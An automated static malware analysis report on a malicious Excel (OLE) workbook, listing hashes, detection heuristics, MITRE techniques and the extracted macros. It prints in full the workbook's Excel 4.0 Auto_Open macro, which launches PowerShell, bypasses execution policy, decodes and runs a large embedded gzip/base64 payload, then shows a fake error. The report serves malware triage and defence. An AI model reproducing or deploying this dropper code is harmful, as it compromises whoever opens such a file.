Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 f424b6eb3b855c89…

MALICIOUS

Office (OLE)

43.5 KB Created: 2020-03-31 08:17:24 Authoring application: Microsoft Excel First seen: 2020-07-24
MD5: ad7677318e9ff63fa0ace3ab445d036f SHA-1: f8705b9f5fa84a9df85320680b1430329664eabc SHA-256: f424b6eb3b855c89e4d2329115e1c43b8da179d40750b7aee1d192d700610331
240 Risk Score

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell T1566.001 Spearphishing Attachment

The file contains Excel 4.0 (XLM) macros with an Auto_Open entry, which is a critical indicator of malicious intent. The XLM macro explicitly calls PowerShell and attempts to bypass execution policy using 'Set-ExecutionPolicy -ExecutionPolicy Bypass -Scope Process -Force~'. This suggests the macro is designed to download and execute a second-stage payload. The presence of VBA macros and ClamAV detection further supports its malicious nature.

Heuristics 6

  • ClamAV: Doc.Dropper.Agent-7644833-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-7644833-0
  • Excel 4.0 Auto_Open defined name critical OLE_XLM_AUTOOPEN_DEFINEDNAME
    oletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF name can be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms the workbook has an XLM auto-execution entry.
  • Reference to PowerShell high SC_STR_POWERSHELL
    Reference to PowerShell
  • Suspicious extracted artifact high EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Excel 4.0 (XLM) macro sheet present medium OLE_XLM_AUTOOPEN
    Workbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
  • VBA macros detected medium OLE_VBA_MACROS
    Document contains VBA macro code

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
xlm_macros.txt xlm-macro oletools.olevba.extract_all_macros (XLM macro listing) 6300 bytes
SHA-256: 44d44205f6a1d6a4798d4f6f844957c8421c7298afaa50d4f77536927f3da959
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 3 shell/COM execution token(s). 83 of 154 identifiers look randomly generated (e.g. 'Jbh5d1fIUF1yD872ujxXMjWhJ6QllCxOM1uKKjec') — consistent with name-mangling obfuscation. Carved artifact contains 5 long base64-like blob(s). Carved macro source contains an auto-exec entry point and execution/download terms.
Preview script
First 1,000 lines of the extracted script
' 0085     10 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, very hidden -  f
' 0085     15 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible -  Foglio
' 0018     23 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open len=7 ptgRef3d  f!C4049 
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' Sheet,Reference,Formula,Value
'  f,A1,"",1.00000000000000000000
'  f,F12,"",5.00000000000000000000
'  f,H52,"",8.00000000000000000000
'  f,C83,"",4.00000000000000000000
'  f,C168,"",0.00000000000000000000
'  f,C4049,ERROR(FALSE),""
'  f,C4050,EXEC("powershell"),""
'  f,C4051,WAIT(NOW()+"00:00:01"),""
'  f,C4052,"SEND.KEYS("$h={(}Get-Process -Id $pid{)}.MainWindowHandle;$ios={[}Runtime.InteropServices.HandleRef{]};$hw=New-Object $ios {(}1,$h{)};$i=New-Object $ios{(}2,0{)};{(}{(}{[}reflection.assembly{]}::LoadWithPartialName{(}"WindowsBase"{)}{)}.GetType{(}"MS.Win32.Unsafe",TRUE)",""
'  f,C4053,"SEND.KEYS("NativeMethods"{)}{)}::SetWindowPos{(}$hw,$i,0,0,100,100,16512{)}~",TRUE)",""
'  f,C4054,WAIT(NOW()+"00:00:01"),""
'  f,C4055,"SEND.KEYS("if {(}{[}IntPtr{]}::Size -ne 4{)}{{}& $env:SystemRoot\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe{}}~",TRUE)",""
'  f,C4056,WAIT(NOW()+"00:00:00"),""
'  f,C4057,"SEND.KEYS("Set-ExecutionPolicy -ExecutionPolicy Bypass -Scope Process -Force~",TRUE)",""
'  f,C4058,WAIT(NOW()+"00:00:01"),""
'  f,C4059,"SEND.KEYS("$b="H4sIAAAAAAAEAE1W6ZKiyBZ{+}FaOiZyzDKTdwoSfmByqbsgmIQsfEFSHZZBOQRcd3vwlWdXdFZErJyfMt52Smf3beO9/EzBVC8AP9t/8tkemYAz8Q{+}Nytur33CJQf8dIHZt7pePHAjMMkBZnsxfzAImzWyIkslwice/8ha3JOcAMmHnAgjCX4XwqM8N/ODzOOCiAp/37/TkpCuDRkYobKSsrwznune1b3rDnbMISIpuZUPjqyS{+}wp",TRUE)",""
'  f,C4060,"SEND.KEYS("Tq5nCbsmCWQ{+}8{+}bmGdk7SkwxDrHWJlshsrE{+}onHiNsrVlRNjQ9vrp/OMV/cBf9F10nACMhpTVhB6Igboq4noPK9vsRzDCQTJ70BU{+}/18RYZIPtH1/mJtrpgrI3N9wV7ZDnu/XZyU8UfyzCAZo97m8m0ouyN2tJok6DkbrkdjqzSsRb9PIwUVTcd9axmXxxGD9G3teFQcOwcitxm7{+}PWiedbIELm1DRhnme{+}0JBEsYX6wMJaAigp",TRUE)",""
'  f,C4061,"SEND.KEYS("AW2Xtq5Pj6GjGR2xDnK3c2ybFlKfQqa/K6hVbBqaIFHEUM4VJawc6MKxaGaPUkHZ3RVyPa5TRD{+}O5eyYqi{+}FNluM22EzYYevieuUsX0SqPu70waIOtu5ZsYg9EvTTOjRWl8XijmMMuqhHB0DYNw/RkCXqTMJFhkfihdUmJrm/WMLZCLcT9KLtl7M6ZHVLC0B6HmU7F59iKl45G907X5EaqahjfVDym8T0r/1stl{+}LpOjNj{+}iWtNAwu0",TRUE)",""
'  f,C4062,WAIT(NOW()+"00:00:00"),""
'  f,C4063,"SEND.KEYS("X00bVvmpFc3YK9Lbn5Sr1UHBq4CK6QcWXeI43bxjpi41joC{+}PLejrHndmIudmzuxuUVX9mbtwxudyvQh5Y0XBfm9HKWScIViViKeDD5MqUehRNywAYAHCVbGBhLiZHTGalMeYP78m{+}pnNhg5a5G2zIGWCXSswkw0gZom7OkkGcM4eiuPOKmhieYTDLs59NwX1ph/1tEimBdvfPBBhNbVpWz9Pkkuf0zsBhKUeWZDM{+}th8DYabp3sGV93F",TRUE)",""
'  f,C4064,"SEND.KEYS("/N9NGZ40gtnIszn2Xp2PSLKRDjpfTq13W40IVxLXVL/0rsfHRhThZXVfXPird96ozccsNU6Eot9Bj{+}zY6EG6{+}RDZxxZQFWuE15XjZDCGuYYq583CTr/p3XK3O9YqQFJnHiAxjcTe8sptMqXYMdvUjb3ash0cuv47pnW/K8kqfxzkeH0U6QvOQsQ9DDeD3qrL4CE/mIYgn9XJz1fp4hRVThB9q96M2X{+}9mh1hdWYV30XHZwqzpJPYLu8pM",TRUE)",""
'  f,C4065,"SEND.KEYS("z9acsJTs5d6pWHS/sVMkINh5qld3nNva18PNOm{+}1Jbh5d1fIUF1yD872ujxXMjWhJ6QllCxOM1uKKjecFvXzYqdXZUofLeqSM75DrgJ7RDEgFpQLTpbWfjthqqMtEdpGdwkbTdhcmSuxehbWgUAQukwdwzq6KJvDuqQTN9qZTMn5boa6QsUgDrdaiXIe{+}v3kiC69CEFtcmLyWu45kziQI5G4HxZ1dkQF6SgW8NSQmWERclINdnssn4omvRG",TRUE)",""
'  f,C4066,WAIT(NOW()+"00:00:00"),""
'  f,C4067,"SEND.KEYS("1jWiHY7cORPuGL9AQzSR0glxReWYu7yqpuEgoLnbTkKto1KRShvFZvHSr/Ti5LJdiwpVrvSYv4I7OriMJci1qVx5TU9necHATz1FfQHyWGSX38cZebavJQZWTc60na4vb{+}HgoLcspO74s5mY2LjL/vHD4DRXyel2U2VEdZiydUYvleqb4nHg2bZClx1JRSOM8WWt1ThsT815SI/qo{+}avxZeiG8aqUETbZeUx4Jtcpt87wA3YgosPVjShifC",TRUE)",""
'  f,C4068,"SEND.KEYS("AdPuTlIKGXR50NzkFQYyFnVLJA{+}upt5{+}XZeiuJlHtVy/V2s5uOoWBqI6{+}p0ZLchDf1FhBTdzmslVxiEU5h9vklpqZHP54nbuliteeKl/41IfDoHjF2tMApk0hd3A5rcqbvLNpY7c7z89pw{+}NvQdpcMPnXndBkt15YTbSL3RjAVPwnhQXqXV{+}w{+}OYSMFFx0dH5BuHk9215rZcQVqnavY{+}lqVBqeaakGO5XRRcfTAbq/1Xec5Wa",TRUE)",""
'  f,C4069,"SEND.KEYS("{+}P8TS2{+}Z4D3GH172hnkb8di2rk7Ngz7B8fMhJaqz62/wSqMNROlyajBX2ncU/3V7nr86PrM5ywA2aS1LgkpSQM0{+}IBquYSyRCbi7MMLYAvAQtYAqhmAI56/T{+}{+}{+}PR{+}e2G9YRBe5uGEmFYQII38/9gYgUclQGITGHtRRRMgMsm4/Wenf/{+}6DxgxEACuJXHgF{+}/d{+}C3vb87ctHpvL/Rb/23fMm99eAN/0PRRPDv{+}9tj",TRUE)",""
'  f,C4070,WAIT(NOW()+"00:00:00"),""
'  f,C4071,"SEND.KEYS("/HxMno/584E8H9jzMXo{+}Zs/H4vlAn4/p8{+}2D7GYuEQQDsftXN4SDWcFJGSRwlmMWpAS{+}DuCzFwE4Z3BIcSaQ8NMUeDjHByBBM3qdv2WQd5gRUkHszo{+}8TohPcKTFnLewk5{+}wdqcLuAZDk5sscORw8ANczkBD48zWcCYDYpV78GGQAojSKIV/3x6FU5727vOfX0CTNv{+}oSd4gQpTx860D1Xm8FR9ghi2hNezlOlOafDLRsF833wx",TRUE)",""
'  f,C4072,"SEND.KEYS("sQeKad/CnzKHbQHx7uMZJJURZOhHGyWK9E088/3n/9uD3J5Z9dj4i0HkfvOSNWlVIA2a3OiiQfzTKrFvjW0P7g8A7r2C0jUeaJdCCbhMgN/LiKPeiW{+}Nw3dgfgCiH634DaKIlYFjNClH{+}rEev1/vbsyEtF1dPIMlgV5ysE8vw4Nl7NPS{+}sF5eQMtXnz7TcdbCGOlHt80xeFnYwr1CRSN3YcxH0w0ga{+}l8Br0K{+}pUSmtTIhNQgJSHJ",TRUE)",""
'  f,C4073,"SEND.KEYS("vTh6mdAu7vUGbzQjnxRB0k4ZflKBaCjuW{+}/xJ8yFfLk3fjVECH8dNbma{+}n8wTQLpN/tGP{+}PkvPE5aSj9{+}Xoxa1lNP5NBm9s4CnzKfVFrzG64vhhCxs3bD/HF0TtlipBq8gkvQCP97W9Y7dM{+}CJ7/fMr{+}qbkLd2/LriXKNwyVOgE/y9XGeEEDTjYvm3QvpuOv9hx9boWmrC2PluqXgy1R0LbF7xRPngwp1qfMaFw8KfTb89PFyWf",TRUE)",""
'  f,C4074,WAIT(NOW()+"00:00:01"),""
'  f,C4075,"SEND.KEYS("D/yxes3e8LI/Tn1X{+}q6093bY33KAOAz{+}6hSF1{+}13GOMM5gIOA47ubn8N2rw3eVDw47Ym379{+}/7G86sVG3atUZTXq6xam7vQETFfEFvPeeIMhAW{+}DJV7t/NUu7LP2A7Zd/MjIgo3ZfBSzczt8e3gg5PlvAdtlnTdFf0jwj4I2wdad1rnGLbWxyRSNtsh5{+}UfmtcK9D4XXuNCfd4OC9ToNmSWQ1DVVmAzJOwwy63Z4BBXU6wEOmJf",TRUE)",""
'  f,C4076,"SEND.KEYS("OrsE28DCLrYHi/gLp/PMh5Z/KEYj478qurP61qHGoM{+}2js6vae/weKe1XjhA0AAA==";nal no New-Object -F;iex {(}no IO.StreamReader{(}no IO.Compression.GZipStream{(}{(}no IO.MemoryStream -A @{(},{[}Convert{]}::FromBase64String{(}$b{)}{)}{)},{[}IO.Compression.Compressio",TRUE)",""
'  f,C4077,"SEND.KEYS("nMode{]}::Decompress{)}{)}{)}.ReadToEnd{(}{)}~{NUMLOCK}",TRUE)",""
'  f,C4078,WAIT(NOW()+"00:00:01"),""
'  f,C4079,APP.ACTIVATE(),""
'  f,C4080,ALERT("Excel non può aprire il file '"&GET.WORKBOOK(16)&"' "),""
'  f,C4081,QUIT(),""
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 767 bytes
SHA-256: fb8f621f90ed16db10ec46cb2092d5dd772943f57a8b113de4f83497af2cb3a4
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Questa_cartella_di_lavoro"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Foglio1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Control = "f, 1, 0, MSForms, Frame"
Attribute VB_Control = "gem, 2, 1, MSForms, CommandButton"
Private Sub f_Layout()

End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.